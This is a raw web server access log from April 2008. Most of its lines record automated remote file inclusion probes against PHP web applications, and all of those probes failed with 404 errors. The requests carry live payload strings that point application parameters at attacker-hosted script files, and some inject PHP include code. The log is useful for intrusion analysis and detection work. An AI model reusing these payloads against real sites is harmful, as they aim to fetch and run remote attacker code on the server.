74.52.2.130 - - [01/Apr/2008:08:43:35 -0700] "GET /index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:43:37 -0700] "GET /logs/access_080101.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:43:37 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:43:38 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:43:38 -0700] "GET /logs/access_080101.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:43:38 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
211.43.210.110 - - [01/Apr/2008:08:43:39 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:44:14 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:44:34 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.redladys.net/tgp/alat/idscan3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:08:44:46 -0700] "GET /logs/access_080101.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:08:44:46 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:08:44:47 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.62.80.134 - - [01/Apr/2008:08:45:17 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.bsfadvisors.com"
209.62.80.134 - - [01/Apr/2008:08:45:17 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:08:46:20 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:08:46:20 -0700] "GET //config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:08:46:21 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
89.107.66.224 - - [01/Apr/2008:08:46:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mamika.net///wp-content/uploads/2007/03/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
89.107.66.224 - - [01/Apr/2008:08:46:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://mamika.net///wp-content/uploads/2007/03/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:47:17 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:47:17 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:47:17 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:47:20 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:47:21 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:47:21 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:08:48:52 -0700] "GET /examples%5CpatExampleGen%5CbbcodeSource.php?example=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:08:48:57 -0700] "GET /logs/examples%5CpatExampleGen%5CbbcodeSource.php?example=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:49:46 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.67.223.188 - - [01/Apr/2008:08:49:48 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:50:52 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:50:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
213.203.223.115 - - [01/Apr/2008:08:50:52 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://it.geocities.com/biglionpowa/asc3id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:08:50:59 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:08:51:00 -0700] "GET //config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:08:51:01 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:08:51:59 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.89.137.99 - - [01/Apr/2008:08:52:25 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.3.249.71 - - [01/Apr/2008:08:52:39 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.bsfadvisors.com"
72.3.249.71 - - [01/Apr/2008:08:52:39 -0700] "GET /index.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:08:53:24 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:08:53:25 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:08:53:26 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
89.108.66.169 - - [01/Apr/2008:08:55:59 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
80.67.27.166 - - [01/Apr/2008:08:56:08 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
80.67.27.166 - - [01/Apr/2008:08:56:09 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:08:56:33 -0700] "GET /administrator/components/com_jjgery/admin.jjgery.php?mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:08:56:33 -0700] "GET /logs/administrator/components/com_jjgery/admin.jjgery.php?mosConfig_absolute_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:56:37 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:56:37 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:56:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:57:54 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:57:54 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:08:57:55 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:04 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:05 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:06 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:06 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.84.20.85 - - [01/Apr/2008:08:58:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:08:58:46 -0700] "GET /logs/access_080201.log/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:59:52 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:08:59:52 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
189.13.177.14 - - [01/Apr/2008:09:01:16 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.bsfadvisors.com"
189.13.177.14 - - [01/Apr/2008:09:01:16 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:09:01:21 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:09:01:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:09:01:37 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.bsfadvisors.com"
74.52.2.130 - - [01/Apr/2008:09:01:56 -0700] "GET /logs/access.log/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:09:02:18 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:09:02:21 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:09:02:21 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:09:02:21 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
77.221.130.3 - - [01/Apr/2008:09:03:53 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://discount-guns.com//modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
72.3.249.71 - - [01/Apr/2008:09:04:12 -0700] "GET /index.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.bsfadvisors.com"
72.3.249.71 - - [01/Apr/2008:09:04:12 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:09:04:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.6.22.91 - - [01/Apr/2008:09:04:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.16.181 - - [01/Apr/2008:09:04:33 -0700] "GET /logs/?S=A HTTP/1.0" 200 2924 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
62.163.141.54 - - [01/Apr/2008:09:04:37 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:09:05:18 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:09:05:19 -0700] "GET //Neos_Chronos/header.php?base_folder=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:09:05:59 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:09:05:59 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
209.163.169.99 - - [01/Apr/2008:09:06:42 -0700] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.6.22.173 - - [01/Apr/2008:09:06:59 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
74.6.29.92 - - [01/Apr/2008:09:07:01 -0700] "GET /logs/access_080401.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:09:12:52 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.98.60.90 - - [01/Apr/2008:09:12:53 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:13:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:13:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:13:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:13:54 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
85.234.144.44 - - [01/Apr/2008:09:13:54 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.205.57.211 - - [01/Apr/2008:09:15:14 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.bsfadvisors.com"
74.205.57.211 - - [01/Apr/2008:09:15:14 -0700] "GET //Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.bsfadvisors.com"
85.17.200.74 - - [01/Apr/2008:09:15:39 -0700] "GET /extauth/drivers/ldap.inc.php?clarolineRepositorySys=www.trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.bsfadvisors.com"
85.17.200.74 - - [01/Apr/2008:09:15:39 -0700] "GET /logs/extauth/drivers/ldap.inc.php?clarolineRepositorySys=www.trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:15:44 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:15:50 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.238.63 - - [01/Apr/2008:09:15:50 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
